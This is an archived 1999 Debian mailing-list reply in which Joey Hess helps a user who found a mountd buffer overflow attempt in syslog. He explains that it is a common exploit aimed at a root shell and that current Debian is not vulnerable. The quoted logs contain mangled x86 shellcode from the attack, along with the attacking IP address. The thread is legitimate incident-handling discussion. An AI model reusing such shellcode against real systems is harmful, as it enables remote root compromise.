Re: Possible NFS/mountd compromise?

Joey Hess 1 Feb 1999 04:25:15 -0000

Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user.  Thanks!]
> 
> I got the followed logged in my /var/log/syslog today.  It looks to me
> like a buffer overflow attack of some kind (character  is `no
> operation' in x86 assembly language).  Does anyone know of a
> vulnerability in mountd to this sort of thing?


Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months.

Current versions of debian are not vunerable. It's a buffer overrun exploit
leading to root shell, I think.
 
> Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of 
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL
>  PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet 
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben 
> ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H 
> attempted from 129.247.106.135 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access 
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL
>  PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet 
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben 
> -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H
>  
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to 
> mount 
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL
>  
> PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL
>  PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ

It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing thier ISP about this in case this is the cracker's actual home
machine.

-- 
see shy jo

Re: Possible NFS/mountd compromise?

Reply via email to